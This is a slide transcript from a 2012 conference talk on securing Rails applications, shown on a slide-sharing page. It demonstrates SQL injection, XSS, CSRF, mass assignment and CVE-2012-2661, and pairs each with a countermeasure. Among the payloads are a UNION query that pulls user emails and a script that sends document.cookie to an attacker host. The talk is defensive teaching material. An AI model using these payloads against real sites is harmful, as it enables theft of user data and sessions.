Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Application Security in Rails

Sponsored · Your Podcast. Everywhere. Effortlessly. Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
Avatar for Uri Nativ Uri Nativ
November 12, 2012
Programming
3
580

Web Application Security in Rails

#railsisrael 2012 lecture on web application security in rails

Avatar for Uri Nativ

Uri Nativ

November 12, 2012
Tweet

More Decks by Uri Nativ

See All by Uri Nativ
QA without QA
Avatar for Uri Nativ unativ
8
1.5k
Building an Awesome Engineering Culture
Avatar for Uri Nativ unativ
2
270
Pecha Kucha - Using Scrum Values to Build the Engineering Culture
Avatar for Uri Nativ unativ
0
290

Other Decks in Programming

See All in Programming
Denoのセキュリティに関する仕組みの紹介 (toranoana.deno #23)
Avatar for uki00a uki00a
0
280
16年目のピクシブ百科事典を支える最新の技術基盤 / The Modern Tech Stack Powering Pixiv Encyclopedia in its 16th Year
Avatar for ahu ahuglajbclajep
5
970
それ、本当に安全? ファイルアップロードで見落としがちなセキュリティリスクと対策
Avatar for ikechi penpeen
7
2.4k
【卒業研究】会話ログ分析によるユーザーごとの関心に応じた話題提案手法
Avatar for MomokoShirakawa momok47
0
190
CSC307 Lecture 05
Avatar for Javier Gonzalez-Sanchez javiergs
PRO
0
490
そのAIレビュー、レビューしてますか? / Are you reviewing those AI reviews?
Avatar for r-kagaya rkaga
6
4.4k
AI Agent の開発と運用を支える Durable Execution #AgentsInProd
Avatar for izumin5210 izumin5210
7
2.2k
Grafana:建立系統全知視角的捷徑
Avatar for Blueswen blueswen
0
320
AI Agent Tool のためのバックエンドアーキテクチャを考える #encraft
Avatar for izumin5210 izumin5210
6
1.8k
2026年 エンジニアリング自己学習法
Avatar for yumechi(Motoki Hirao) yumechi
0
120
インターン生でもAuth0で 認証基盤刷新が出来るのか
Avatar for takumi taku271
0
190
AI Schema Enrichment for your Oracle AI Database
Avatar for thatjeffsmith thatjeffsmith
0
210

Featured

See All Featured
The Power of CSS Pseudo Elements
Avatar for Geoffrey Crofte geoffreycrofte
80
6.1k
Discover your Explorer Soul
Avatar for Emna emna__ayadi
2
1.1k
Are puppies a ranking factor?
Avatar for Jono Alderson jonoalderson
1
2.7k
The Cost Of JavaScript in 2023
Avatar for Addy Osmani addyosmani
55
9.5k
The Anti-SEO Checklist Checklist. Pubcon Cyber Week
Avatar for Ryan Jones ryanjones
0
53
WENDY [Excerpt]
Avatar for Tessa Abrams tessaabrams
9
36k
Reflections from 52 weeks, 52 projects
Avatar for Jefferson Lam jeffersonlam
356
21k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
Avatar for Eileen M. Uchitelle eileencodes
26
3.3k
Redefining SEO in the New Era of Traffic Generation
Avatar for Szymon szymonslowik
1
210
Six Lessons from altMBA
Avatar for Skipper Chong Warson skipperchong
29
4.1k
Statistics for Hackers
Avatar for Jake VanderPlas jakevdp
799
230k
Improving Core Web Vitals using Speculation Rules API
Avatar for Sergey Chernyshev sergeychernyshev
21
1.4k

Transcript

  1. WEB APPLICATION SECURITY IN RAILS Uri Nativ RailsIsrael 2012

  2. Uri Nativ @unativ Head of Engineering Klarna Tel Aviv #railsisrael

  3. Buy Now, Pay Later 1.  Shop online 2.  Receive your

    goods 3.  Pay

  4. Alice

  5. Bob

  6. Alice and Bob

  7. Alice and Bob

  8. Alice and Bob Like Duh?

  9. Alice and Bob <html> <title> MicroBlogging </title> ... #$@# %#@&*#$

  10. Alice and Bob Hack it!

  11. SQL INJECTION

  12. @results = Micropost.where( "content LIKE '%#{params[:query]%’”).all SELECT 'microposts'.* FROM 'microposts’

    WHERE (content LIKE ’%SEARCHSTRING%’) SQL Injection

  13. SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%SEARCHSTRING%') SQL Injection

    XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --

  14. SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT

    1, email, 1, 1, 1 FROM users -- %') SQL Injection

  15. SELECT 'microposts'.* FROM 'microposts' WHERE (content LIKE '%XXX') UNION SELECT

    1, email, 1, 1, 1 FROM users -- %') SQL Injection

  16. @results = Micropost.where( "content LIKE ?’, "%#{params[:query]}%”) ).all SQL Injection

    - countermeasures

  17. CROSS SITE SCRIPTING XSS

  18. <span class="content"> <%= raw feed_item.content %> </span> XSS

  19. <script> document.write('<img src= "http://www.attacker.com/x.png?' + document.cookie + ’” >'); </script>

    XSS

  20. <span class="content"> <%= sanitize feed_item.content, :tags => ['a’] %> </span>

    XSS - countermeasures

  21. The Attack: Execute arbitrary code / defacement JSON is not

    escaped by default CSS can be injected as well Countermeasures: Never trust data from the users Use Markdown (e.g. Redcarpet gem) XSS

  22. CROSS SITE REQUEST FORGERY CSRF

  23. www.blog.com CSRF 1

  24. www.blog.com 2 Click here for free iPad www.freeiPad.com <form name=“evilform”

    action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF

  25. www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> CSRF

    3

  26. www.blog.com www.freeiPad.com <form name=“evilform” action=“www.blog.com/….”> … <script> document.evilform.submit() </script> POST

    /blogpost Content=“Kick Me!” CSRF 4

  27. <input name ="authenticity_token” type ="hidden” value ="vyFdEgofzU4oSJJn5wypxq4“ /> CSRF –

    Authenticity Token

  28. routes.rb match '/delete_post/:id', to: 'microposts#destroy' CSRF

  29. class ApplicationController < ActionController::Base # commented to easily test forms

    # protect_from_forgery ... end CSRF

  30. The Attack: Attacker send requests on the victim’s behalf Doesn’t

    depend on XSS Attacked doesn’t need to be logged-in Countermeasures: Use Rails CSRF default protection (do not override it) Use GET for queries Use POST/DELETE/… when updating data Add Sign-out link CSRF

  31. RAILS SPECIFIC ATTACKS

  32. MASS ASSIGNMENT boo[gotcha!]

  33. def create @user = User.new(params[:user]) ... end Mass Assignment

  34. def create @user = User.new(params[:user]) ... end Mass Assignment {

    :name => “gotcha”, :admin => true }

  35. Blacklist class User < ActiveRecord::Base attr_protected :admin ... end Mass

    Assignment - countermeasures

  36. Whitelist class User < ActiveRecord::Base attr_accessible :name, :email, :password, :password_confirmation

    ... Mass Assignment - countermeasures

  37. Global Config (whitelist) config.active_record. whitelist_attributes = true Mass Assignment -

    countermeasures

  38. The Attack: Unprotected by default :( Countermeasures: Whitelist Blacklist Strong

    Parameters (whitelist) Rails 4 Logic moved to the controller Available as a Gem Mass Assignment

  39. SQL INJECTION VULNERABILITY IN RUBY ON RAILS (CVE-2012-2661)

  40. User.where( :id => params[:user_id], :reset_token => params[:token] ) SELECT users.*

    FROM users WHERE users.id = 6 AND users.reset_token = ’XYZ' LIMIT 1 CVE-2012-2661 SQL Injection

  41. /users/6/password/edit?token[] SELECT users.* FROM users WHERE users.id = 6 AND

    users.reset_token IS NULL LIMIT 1 CVE-2012-2661 SQL Injection

  42. The Attack: SQL Injection - Affected version: Rails < 3.2.4

    Countermeasures: Upgrade to Rails 3.2.4 or higher CVE-2012-2661 SQL Injection

  43. ------------------------------------------------- | Warning Type | Total | ------------------------------------------------- | Cross

    Site Scripting | 2 | | Cross-Site Request Forgery | 1 | | Denial of Service | 1 | | Redirect | 1 | | SQL Injection | 4 | ------------------------------------------------- Brakeman

  44. CONCLUSIONS

  45. Make Love not War

  46. Know the threats – OWASP top 10 Follow Rails conventions

    Ruby on Rails Security Guide http://guides.rubyonrails.org/security.html The Ruby on Rails security project http://www.rorsecurity.info Rails security mailing list: http://groups.google.com/group/rubyonrails-security Conclusions

  47. Daniel Amselem for pair programming Irit Shainzinger for the cool

    graphics Michael Hartl for his microblogging app tutorial Thanks to…

  48. Pay Online – Safer and Simpler https://github.com/unativ/sample_app